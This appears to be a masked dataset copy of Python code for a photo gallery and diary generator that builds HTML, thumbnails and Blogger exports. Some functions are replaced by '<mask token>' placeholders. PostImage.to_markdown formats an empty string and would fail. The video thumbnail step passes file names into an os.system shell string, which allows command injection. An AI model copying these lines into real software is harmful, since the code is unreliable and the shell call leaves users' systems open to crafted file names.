% (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return VIDPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return VIDDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n x = f'<p style=\"text-align: center;\">{self.iframe}</p>'\n if not self.caption:\n return x\n else:\n return f'%s\\n{CAPTION_PAT}' % (x, self.caption)\n\n\nclass PostSubdir(PostItem):\n\n def to_html_dcim(self, args):\n basename = os.path.basename(self.htmname)\n posts = self.posts\n title = self.caption\n print_html(args, posts, title, self.htmname)\n if not self.caption:\n return DIRPOST % (basename, self.thumb, *self.thumbsize)\n else:\n return DIRPOSTCAPTION % (basename, self.thumb, *self.thumbsize,\n self.caption)\n\n\n<mask token>\n\n\ndef parse_markdown(filename):\n \"\"\"\n Generate Post objects from markdown. Date must be present in each post and\n posts must be ordrered by date.\n \"\"\"\n if not os.path.exists(filename):\n error('File not found', filename)\n posts = list()\n with open(filename, encoding='utf-8') as f:\n line = next(f)\n if line.startswith('# '):\n title = line[2:].strip()\n record = []\n next(f)\n else:\n title = None\n record = [line]\n for line in f:\n if not line.startswith('___'):\n record.append(line)\n else:\n posts.append(Post.from_markdown(record))\n record = []\n daterank = defaultdict(int)\n for post in posts:\n daterank[post.date] += 1\n post.daterank = daterank[post.date]\n for post1, post2 in zip(posts[:-1], posts[1:]):\n if post1.date > post2.date:\n error('Posts are not ordered', f'{post1.date} > {post2.date}')\n return title, posts\n\n\ndef print_markdown(posts, title, fullname):\n with open(fullname, 'wt', encoding='utf-8') as fdst:\n print(f'# {title}\\n', file=fdst)\n for post in posts:\n date = f'[{post.date[0:4]}/{post.date[4:6]}/{post.date[6:8]}]'\n print(date, file=fdst)\n if post.text:\n print(file=fdst)\n for line in post.text.splitlines():\n if not line:\n print(file=fdst)\n else:\n for chunk in textwrap.wrap(line, width=78):\n print(chunk, file=fdst)\n if post.medias:\n print(file=fdst)\n for media in post.medias:\n print(media.to_markdown(), file=fdst)\n print('______', file=fdst)\n\n\n<mask token>\n\n\ndef print_html(args, posts, title, html_name, target='regular'):\n assert target in ('regular', 'blogger')\n with io.StringIO() as f:\n print_html_to_stream(args, posts, title, f, target)\n html = f.getvalue()\n if html_name:\n if os.path.exists(html_name):\n with open(html_name, 'rt', encoding='utf-8') as f:\n html0 = f.read()\n if html == html0:\n return None\n with open(html_name, 'wt', encoding='utf-8') as f:\n f.write(html)\n return None\n else:\n return html\n\n\n<mask token>\n\n\ndef is_image_file(name):\n return os.path.splitext(name)[1].lower() in ('.jpg', '.jpeg', '.png',\n '.gif', '.bmp', '.webp', '.tif')\n\n\n<mask token>\n\n\ndef is_media(name):\n return is_image_file(name) or is_video_file(name)\n\n\n<mask token>\n\n\ndef date_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})(?:\\\\D|$)', name, re.ASCII)):\n digits = match.group(1)\n if validate_date(digits):\n return digits\n return None\n\n\ndef date_from_item(filename):\n if (date := date_from_name(filename)):\n return date\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%Y%m%d')\n\n\ndef time_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})\\\\D(\\\\d{6})(?:\\\\D|$)', name,\n re.ASCII)):\n digits = match.group(2)\n hour, minute, second = int(digits[0:2]), int(digits[2:4]), int(digits\n [4:6])\n if 0 <= hour < 24 and 0 <= minute < 60 and 0 <= second < 60:\n return digits\n return None\n\n\ndef time_from_item(filename):\n if (time := time_from_name(filename)):\n return time\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%H%M%S')\n\n\n<mask token>\n\n\ndef get_image_info(filename):\n date = date_from_item(filename)\n time = time_from_item(filename)\n img = Image.open(filename)\n width, height = img.size\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n return (date, time, width, height, size\n ), f'{date} {time}, dim={width}x{height}, {size} MB'\n\n\ndef get_video_info(filename, info_fullname):\n if os.path.exists(info_fullname):\n with open(info_fullname) as f:\n info = f.readline().split()\n date, time, width, height, size, duration, fps = info[0], info[1], int(\n info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6]\n )\n formatted_info = format_video_info(date, time, width, height, size,\n duration, fps)\n return (date, time, width, height, size, duration, fps), formatted_info\n else:\n info, formatted_info = make_video_info(filename, info_fullname)\n with open(info_fullname, 'wt') as f:\n print(' '.join([str(_) for _ in info]), file=f)\n return info, formatted_info\n\n\ndef make_video_info(filename, info_fullname):\n date = date_from_item(filename)\n time = time_from_item(filename)\n command = [*FFPROBE_CMD.split(), filename]\n try:\n output = check_output(command, stderr=STDOUT).decode()\n width, height, fps, duration = parse_ffprobe_output(output)\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n output = format_video_info(date, time, width, height, size,\n duration, fps)\n except CalledProcessError as e:\n output = e.output.decode()\n warning(output)\n raise\n return (date, time, width, height, size, duration, fps), output\n\n\ndef parse_ffprobe_output(ffprobe_output):\n match = re.match(\n '(\\\\d+),(\\\\d+),(\\\\d+)/(\\\\d+),(\\\\d+/\\\\d+).*\\\\s(\\\\d+\\\\.\\\\d+)',\n ffprobe_output, re.DOTALL)\n width = int(match.group(1))\n height = int(match.group(2))\n fps = round(int(match.group(3)) / int(match.group(4)), 1)\n duration = round(float(match.group(6)))\n return width, height, fps, duration\n\n\ndef format_video_info(date, time, width, height, size, duration, fps):\n return (\n f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'\n )\n\n\n<mask token>\n\n\ndef thumbname(name, key):\n return key + '-' + name + '.jpg'\n\n\ndef size_thumbnail(width, height, maxdim):\n if width >= height:\n return maxdim, int(round(maxdim * height / width))\n else:\n return int(round(maxdim * width / height)), maxdim\n\n\ndef make_thumbnail_image(args, image_name, thumb_name, size):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_image(image_name, thumb_name, size)\n\n\ndef create_thumbnail_image(image_name, thumb_name, size):\n imgobj = Image.open(image_name)\n if imgobj.mode != 'RGBA' and image_name.endswith('.jpg') and not (\n image_name.endswith('.gif') and imgobj.info.get('transparency')):\n imgobj = imgobj.convert('RGBA')\n imgobj.thumbnail(size, Image.LANCZOS)\n imgobj = imgobj.convert('RGB')\n imgobj.save(thumb_name)\n\n\ndef make_thumbnail_video(args, video_name, thumb_name, size, duration):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_video(args, video_name, thumb_name, size, duration)\n\n\n<mask token>\n\n\ndef create_thumbnail_video(args, filename, thumbname, size, duration):\n delay = min(duration - 1, args.thumbnails.thumbdelay)\n sizearg = '%dx%d' % size\n command = (\n 'ffmpeg -y -v error -itsoffset -%d -i \"%s\" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s \"%s\"'\n )\n command = command % (delay, filename, sizearg, thumbname)\n result = os.system(command)\n try:\n img1 = Image.open(thumbname)\n except:\n warning('Unable to save thumbnail for', filename)\n return\n img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))\n width, height = img1.size\n img1.paste(img2, (6, height - 20 - 6), None)\n img1.save(thumbname)\n\n\n<mask token>\n\n\ndef create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):\n\n def size_thumbnail(width, height, xmax, ymax):\n width2 = xmax\n height2 = int(round(xmax * height / width))\n if height2 < ymax:\n width2 = int(round(ymax * width / height))\n height2 = ymax\n return width2, height2\n thumblist = [os.path.basename(item.thumb) for item in items]\n widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size\n , thumblist)\n thumbnum = widthnum * heightnum\n img = Image.new('RGB', size, SUBDIR_BACKCOL)\n for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):\n row = ind // widthnum\n col = ind % widthnum\n img2 = Image.open(os.path.join(thumbdir, thumb))\n w, h = size_thumbnail(*img2.size, width[col], height[row])\n cropdim = (w - width[col]) // 2, (h - height[row]) // 2, (w - width\n [col]) // 2 + width[col], (h - height[row]) // 2 + height[row]\n img2 = img2.resize((w, h), Image.LANCZOS)\n img2 = img2.crop(cropdim)\n img.paste(img2, (offsetx[col], offsety[row]))\n if os.path.exists(thumb_name):\n imgref = Image.open(thumb_name)\n byteio = io.BytesIO()\n img.save(byteio, 'JPEG')\n byteio.seek(0)\n imgnew = Image.open(byteio)\n diff = ImageChops.difference(imgnew, imgref)\n if diff.getbbox() is None:\n return\n img.save(thumb_name)\n\n\ndef mosaic_geometry(size, thumblist):\n if len(thumblist) == 1:\n widthnum = 1\n heightnum = 1\n elif len(thumblist) <= 3:\n widthnum = 1\n heightnum = 2\n elif len(thumblist) <= 8:\n widthnum = 2\n heightnum = 2\n else:\n widthnum = 3\n heightnum = 3\n if widthnum == 1:\n width = [size[0] - 2]\n else:\n width = [size[0] // widthnum - 2] * (widthnum - 1)\n width.append(size[0] - (1 + sum(width) + 2 * len(width) + 1))\n if heightnum == 1:\n height = [size[1] - 2]\n else:\n height = [size[1] // heightnum - 2] * (heightnum - 1)\n height.append(size[1] - (1 + sum(height) + 2 * len(height) + 1))\n offsetx = [1]\n for w in width[:-1]:\n offsetx.append(offsetx[-1] + w + 2)\n offsety = [1]\n for h in height[:-1]:\n offsety.append(offsety[-1] + h + 2)\n return widthnum, heightnum, width, height, offsetx, offsety\n\n\n<mask token>\n\n\ndef list_of_htmlfiles_in_items(itemlist):\n htmlist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n htmlist.append(item.htmname)\n htmlist.extend(list_of_htmlfiles_in_items(item.sublist))\n return htmlist\n\n\ndef list_of_thumbnails(posts, diary=False):\n thumblist = list()\n for post in posts:\n thumblist.extend(list_of_thumbnails_in_items(post.medias))\n if diary is False:\n thumblist.extend(list_of_thumbnails_in_items(post.dcim))\n return thumblist\n\n\ndef list_of_thumbnails_in_items(itemlist):\n thumblist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n thumblist.append(os.path.basename(item.thumb))\n thumblist.extend(list_of_thumbnails_in_items(item.sublist))\n else:\n thumblist.append(os.path.basename(item.thumb))\n return thumblist\n\n\ndef purge_htmlfiles(args, posts):\n \"\"\"\n Purge root dir from irrelevant html files\n \"\"\"\n htmlist = list_of_htmlfiles(args, posts)\n html_to_remove = list()\n for fullname in glob.glob(os.path.join(args.root, '*.htm*')):\n if fullname not in htmlist:\n html_to_remove.append(fullname)\n if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(html_to_remove)} html files to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in html_to_remove:\n print('Removing html files', name)\n os.remove(name)\n\n\ndef purge_thumbnails(args, thumbdir, posts, diary=False):\n \"\"\"\n Purge thumbnail dir from irrelevant thumbnails\n \"\"\"\n thumblist = list_of_thumbnails(posts, diary)\n thumbs_to_remove = list()\n for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):\n if os.path.basename(fullname) not in thumblist:\n thumbs_to_remove.append(fullname)\n if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in thumbs_to_remove:\n print('Removing thumbnail', name)\n os.remove(name)\n info_fullname = os.path.splitext(name)[0] + '.info'\n if os.path.exists(info_fullname):\n os.remove(info_fullname)\n\n\ndef is_media_within_dates(fullname, dates):\n if is_media(fullname):\n if type(dates) == tuple:\n return dates[0] <= date_from_item(fullname) <= dates[1]\n else:\n return True\n else:\n return False\n\n\ndef sorted_listdir(filelist):\n like_windows_explorer = True\n if not filelist:\n return filelist\n if like_windows_explorer:\n maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)\n\n def keyfunc(name):\n root, ext = os.path.splitext(name.lower())\n return root.ljust(maxlen, ' ') + ext\n else:\n keyfunc = str.lower\n return sorted(filelist, key=keyfunc)\n\n\n<mask token>\n\n\ndef list_of_medias(args, sourcedir, recursive):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n \"\"\"\n files = list_of_files(sourcedir, recursive)\n return [_ for _ in files if is_media_within_dates(_, args.dates)]\n\n\n<mask token>\n\n\ndef dispatch_post_items(list_of_post_items):\n subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]\n medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]\n return subdirs, medias\n\n\ndef create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n if os.path.isfile(media_fullname):\n if is_image_file(media_fullname):\n return create_item_image(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_video(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_subdir(args, media_fullname, sourcedir, thumbdir,\n key, thumbmax)\n\n\ndef create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n try:\n info, infofmt = get_image_info(media_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)\n return PostImage(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except PIL.UnidentifiedImageError:\n warning('Unable to read image', media_fullname)\n return None\n\n\ndef create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'\n try:\n info, infofmt = get_video_info(media_fullname, info_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_video(args, media_fullname, thumb_fullname,\n thumbsize, duration=info[5])\n return PostVideo(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except CalledProcessError:\n warning('Unable to read video', media_fullname)\n return None\n\n\n<mask token>\n\n\ndef relative_name(media_fullname, sourcedir):\n \"\"\"\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg\n -->\n deeper2_deepest_OCT_20000112_000004.jpg\n\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest\n -->\n deeper2_deepest\n \"\"\"\n x = os.path.relpath(media_fullname, sourcedir)\n x = x.replace('\\\\', '_').replace('/', '_').replace('#', '_')\n return x\n\n\n<mask token>\n\n\ndef make_posts_from_diary(args):\n md_filename = os.path.join(args.root, 'index.md')\n if os.path.exists(md_filename):\n title, posts = parse_markdown(md_filename)\n else:\n error('File not found', md_filename)\n for post in posts:\n for media in post.medias:\n media_fullname = os.path.join(args.root, media.uri)\n item = create_item(args, media_fullname, args.root, args.\n thumbdir, 'post', 400)\n media.thumb = item.thumb\n media.thumbsize = item.thumbsize\n media.descr = item.descr\n return title, posts\n\n\n<mask token>\n\n\ndef make_posts_from_subdir(args, dirname):\n if args.bydir is False:\n medias_ext = list_of_medias(args, dirname, args.recursive)\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n postmedias = list()\n for item in medias_ext:\n postmedia = create_item(args, item, args.sourcedir, args.thumbdir,\n 'dcim', 300)\n if postmedia is not None:\n postmedias.append(postmedia)\n post = Post(date='00000000', text='', medias=[])\n post.dcim = postmedias\n posts = [post]\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.\n sourcedir)[0]\n return title, posts\n\n\n<mask token>\n\n\ndef create_gallery(args):\n title, posts = make_posts(args, args.sourcedir)\n print_html(args, posts, title, os.path.join(args.dest, args.rootname),\n 'regular')\n purge_htmlfiles(args, posts)\n if args.diary and not args.sourcedir:\n purge_thumbnails(args, args.thumbdir, posts, diary=True)\n else:\n purge_thumbnails(args, args.thumbdir, posts)\n\n\ndef create_diary(args):\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n if args.dates == 'diary':\n assert 0\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n title = args.sourcedir\n posts = list()\n for date in sorted(required_dates):\n posts.append(Post.from_date(date))\n os.makedirs(args.root, exist_ok=True)\n print_markdown(posts, title, os.path.join(args.root, 'index.md'))\n\n\n<mask token>\n\n\ndef compare_image_buffers(imgbuf1, imgbuf2):\n \"\"\"\n return True if images read on file are identical, False otherwise\n \"\"\"\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not diff.getbbox()\n\n\ndef check_images(args, posts, online_images):\n result = True\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.basename in online_images:\n with open(os.path.join(args.root, media.uri), 'rb') as f:\n imgbuf1 = f.read()\n try:\n with urlopen(online_images[media.basename][0]) as u:\n imgbuf2 = u.read()\n except FileNotFoundError:\n print('File not found', online_images[media.\n basename][0])\n next\n if compare_image_buffers(imgbuf1, imgbuf2) is False:\n print('Files are different, upload', media.basename)\n elif 1:\n print('File already online', media.basename)\n else:\n print('File is absent, upload', media.basename)\n result = False\n elif type(media) is PostVideo:\n print('Video not checked', media.basename)\n else:\n assert False\n return result\n\n\ndef compose_blogger_html(args, title, posts, imgdata, online_videos):\n \"\"\" Compose html with blogger image urls\n \"\"\"\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.uri not in imgdata:\n print('Image missing: ', media.uri)\n else:\n img_url, resized_url = imgdata[media.uri]\n media.uri = img_url\n media.resized_url = resized_url\n elif type(media) is PostVideo:\n if not online_videos:\n print('Video missing: ', media.uri)\n else:\n media.iframe = online_videos[0]\n del online_videos[0]\n else:\n assert False\n return print_html(args, posts, title, '', target='blogger')\n\n\ndef prepare_for_blogger(args):\n \"\"\"\n Export blogger html to clipboard.\n If --full, export complete html, otherwise export html extract ready to\n paste into blogger edit mode.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n online_images, online_videos = online_images_url(args)\n if args.check_images and check_images(args, posts, online_images) is False:\n pass\n html = compose_blogger_html(args, title, posts, online_images,\n online_videos)\n if args.full is False:\n html = re.search('<body>(.*)?</body>', html, flags=re.DOTALL).group(1)\n html = re.sub('<script>.*?</script>', '', html, flags=re.DOTALL)\n html = STYLE.replace('%%', '%') + html\n if args.dest:\n with open(args.dest, 'wt', encoding='utf-8') as f:\n f.write(html)\n else:\n clipboard.copy(html)\n\n\ndef idempotence(args):\n \"\"\"\n For testing identity between a diary file and the fle obtained after reading\n and printing it. See testing.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n print_markdown(posts, title, os.path.join(args.dest, 'index.md'))\n\n\n<mask token>\n\n\nclass MyConfigParser(ConfigParser):\n \"\"\"Add input checking.\"\"\"\n\n def __init__(self):\n ConfigParser.__init__(self, inline_comment_prefixes=(';',))\n\n def error(self, section, entry):\n error('Missing or incorrect config value:', '[%s]%s' % (section, entry)\n )\n\n def getint(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getint(self, section, entry)\n else:\n return ConfigParser.getint(self, section, entry, raw=True,\n vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n def getboolean(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getboolean(self, section, entry)\n else:\n return ConfigParser.getboolean(self, section, entry, raw=\n True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n\ndef configfilename(params):\n return os.path.join(params.root, '.config.ini')\n\n\ndef createconfig(config_filename):\n with open(config_filename, 'wt') as f:\n f.writelines(CONFIG_DEFAULTS)\n\n\ndef read_config(params):\n config_filename = configfilename(params)\n try:\n if not os.path.exists(config_filename) or params.resetcfg:\n createconfig(config_filename)\n except:\n error('Error creating configuration file')\n try:\n getconfig(params, config_filename)\n except Exception as e:\n error('Error reading configuration file.', str(e), 'Use --resetcfg')\n\n\n<mask token>\n\n\ndef setconfig_cmd(args):\n config_filename = configfilename(args)\n setconfig(config_filename, *args.setcfg)\n\n\ndef update_config(args):\n updates = ('sourcedir', args.sourcedir), ('bydir', BOOL[args.bydir]), (\n 'bydate', BOOL[args.bydate]), ('diary', BOOL[args.diary]), ('recursive'\n , BOOL[args.recursive]), ('dates', args.dates), ('github_pages',\n BOOL[args.github_pages])\n cfgname = configfilename(args)\n with open(cfgname) as f:\n cfglines = [_.strip() for _ in f.readlines()]\n for key, value in updates:\n for iline, line in enumerate(cfglines):\n if line.startswith(key):\n cfglines[iline] = f'{key} = {value}'\n break\n with open(cfgname, 'wt') as f:\n for line in cfglines:\n print(line, file=f)\n\n\ndef warning(*msg):\n print(colorama.Fore.YELLOW + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n\n\n<mask token>\n\n\ndef errorcode(msg):\n return ERRORS.splitlines().index(msg) + 1\n\n\ndef error(*msg):\n print(colorama.Fore.RED + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n sys.exit(errorcode(msg[0]))\n\n\n<mask token>\n\n\ndef setup_part1(args):\n \"\"\"\n Made before reading config file (config file located in args.root).\n Check and normalize root path.\n \"\"\"\n args.rootarg = args.root\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext == '':\n pass\n else:\n args.root = os.path.dirname(args.root)\n if args.root:\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n if args.gallery:\n os.mkdir(args.root)\n else:\n error('Directory not found', args.root)\n\n\ndef setup_part2(args):\n \"\"\"\n Made after reading config file.\n Check for ffmpeg in path.\n Create .thumbnails dir if necessary and create .nomedia in it.\n Copy photobox file to destination dir.\n Handle priority between command line and config file.\n \"\"\"\n if args.update:\n args.sourcedir = args.source.sourcedir\n args.bydir = args.source.bydir\n args.bydate = args.source.bydate\n args.diary = args.source.diary\n args.recursive = args.source.recursive\n args.dates = args.source.dates\n args.github_pages = args.source.github_pages\n elif args.gallery:\n args.source.sourcedir = args.sourcedir\n args.source.bydir = args.bydir\n args.source.bydate = args.bydate\n args.source.diary = args.diary\n args.source.recursive = args.recursive\n args.source.dates = args.dates\n args.source.github_pages = args.github_pages\n update_config(args)\n if args.github_pages:\n args.html_suffix = '.html'\n else:\n args.html_suffix = '.htm'\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext:\n args.rootname = os.path.basename(args.rootarg)\n else:\n args.rootname = 'index' + args.html_suffix\n if args.sourcedir:\n args.sourcedir = os.path.abspath(args.sourcedir)\n if os.path.splitdrive(args.sourcedir)[0]:\n drive, rest = os.path.splitdrive(args.sourcedir)\n args.sourcedir = drive.upper() + rest\n if not os.path.isdir(args.sourcedir):\n error('Directory not found', args.sourcedir)\n elif args.gallery and args.diary is False and args.update is None:\n error('Directory not found', 'Use --sourcedir')\n if args.dest:\n args.dest = os.path.abspath(args.dest)\n if args.dest is None:\n args.dest = args.root\n if args.blogger and args.urlblogger is None:\n error('No blogger url (--url)')\n if args.gallery or args.update:\n for exe in ('ffmpeg', 'ffprobe'):\n try:\n check_output([exe, '-version'])\n except FileNotFoundError:\n error('File not found', exe)\n if args.github_pages:\n args.thumbrep = 'thumbnails'\n else:\n args.thumbrep = '.thumbnails'\n args.thumbdir = os.path.join(args.dest, args.thumbrep)\n if not os.path.exists(args.thumbdir):\n os.mkdir(args.thumbdir)\n open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()\n favicondst = os.path.join(args.dest, 'favicon.ico')\n if not os.path.isfile(favicondst):\n faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')\n shutil.copyfile(faviconsrc, favicondst)\n photoboxdir = os.path.join(args.dest, 'photobox')\n if not os.path.exists(photoboxdir):\n photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')\n shutil.copytree(photoboxsrc, photoboxdir)\n if args.dates:\n if not (args.gallery or args.create):\n pass\n if args.dates == 'source':\n pass\n elif args.dates == 'diary':\n if args.create:\n error('Incorrect date format', args.dates)\n elif re.match('\\\\d+-\\\\d+', args.dates):\n date1, date2 = args.dates.split('-')\n if validate_date(date1) and validate_date(date2):\n args.dates = date1, date2\n else:\n error('Incorrect date format', args.dates)\n else:\n error('Incorrect date format', args.dates)\n\n\ndef main(argstring=None):\n colorama.init()\n args = parse_command_line(argstring)\n setup_part1(args)\n read_config(args)\n setup_part2(args)\n try:\n if args.gallery or args.update:\n create_gallery(args)\n elif args.create:\n create_diary(args)\n elif args.blogger:\n prepare_for_blogger(args)\n elif args.idem:\n idempotence(args)\n elif args.setcfg:\n setconfig_cmd(args)\n except KeyboardInterrupt:\n warning('Interrupted by user.')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Post:\n\n def __init__(self, date, text, medias):\n self.date = date\n self.text = text\n self.medias = medias\n self.dcim = []\n self.daterank = 0\n self.extra = False\n\n def __lt__(self, other):\n return self.date < other.date\n\n @classmethod\n def from_markdown(cls, post):\n m = re.match('\\\\[(\\\\d\\\\d\\\\d\\\\d/\\\\d\\\\d/\\\\d\\\\d)\\\\]\\\\n*', post[0])\n if m:\n date = m.group(1).replace('/', '')\n if not validate_date(date):\n error('Incorrect date value:', date)\n del post[0]\n else:\n error('No date in post', ' '.join(post))\n while post and not post[0].strip():\n del post[0]\n text = ''\n while post and not re.match('!?\\\\[\\\\]', post[0]):\n text += post[0]\n del post[0]\n text = re.sub('\\\\n\\\\n$', '\\n', text)\n medias = list()\n while post and (match := re.match('!?\\\\[\\\\]\\\\((.*)\\\\)', post[0])):\n media = match.group(1)\n caption = None\n del post[0]\n if post and not re.match('!?\\\\[\\\\]', post[0]):\n caption = post[0].strip()\n del post[0]\n if match.group(0)[0] == '!':\n medias.append(PostImage(caption, media))\n else:\n medias.append(PostVideo(caption, media))\n return cls(date, text, medias)\n\n @classmethod\n def from_date(cls, date):\n dt = datetime.datetime.strptime(date, '%Y%m%d')\n datetext = dt.strftime('%A %d %B %Y').capitalize()\n post = cls(date, text=datetext, medias=[])\n post.daterank = 1\n return post\n\n def to_html(self, args, target='regular'):\n if target == 'regular':\n if args.diary:\n return self.to_html_diary(args)\n else:\n return self.to_html_regular(args)\n if target == 'blogger':\n return self.to_html_blogger()\n\n def to_html_regular(self, args):\n html = list()\n if self.text:\n html.append(markdown.markdown(self.text))\n subdirs, dcim = dispatch_post_items(self.dcim)\n if self.dcim:\n html.append(SEP)\n for media in subdirs:\n html.append(media.to_html_dcim(args))\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n return html\n\n def to_html_diary(self, args):\n html = list()\n if self.extra:\n html.append('<div class=\"extra\">')\n if self.text:\n html.append(markdown.markdown(self.text))\n if self.medias:\n html.append(f'<div id=\"gallery-blog-{self.date}-{self.daterank}\">')\n for media in self.medias:\n html.append(media.to_html_post(args))\n html.append('</div>')\n _, dcim = dispatch_post_items(self.dcim)\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n html.append(SEP)\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n if self.extra:\n html.append('</div>')\n return html\n\n def to_html_blogger(self):\n html = list()\n html.append(markdown.markdown(self.text))\n for image in self.medias:\n html.append(image.to_html_blogger())\n html.append(SEP)\n return html\n\n\nclass PostItem:\n\n def __init__(self, caption, uri, thumb=None, thumbsize=None, descr=''):\n self.caption = caption\n self.uri = uri\n self.basename = os.path.basename(uri)\n self.thumb = thumb\n self.thumbsize = thumbsize\n self.descr = descr\n self.resized_url = None\n\n\nclass PostImage(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '' % (self.uri,)\n else:\n return '\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return IMGPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return IMGPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return IMGDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n if not self.caption:\n return BIMGPAT % (self.uri, self.resized_url)\n else:\n return f'{BIMGPAT}\\n{CAPTION_PAT}' % (self.uri, self.\n resized_url, self.caption)\n\n\nclass PostVideo(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '[](%s)' % (self.uri,)\n else:\n return '[](%s)\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return VIDPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return VIDPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return VIDDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n x = f'<p 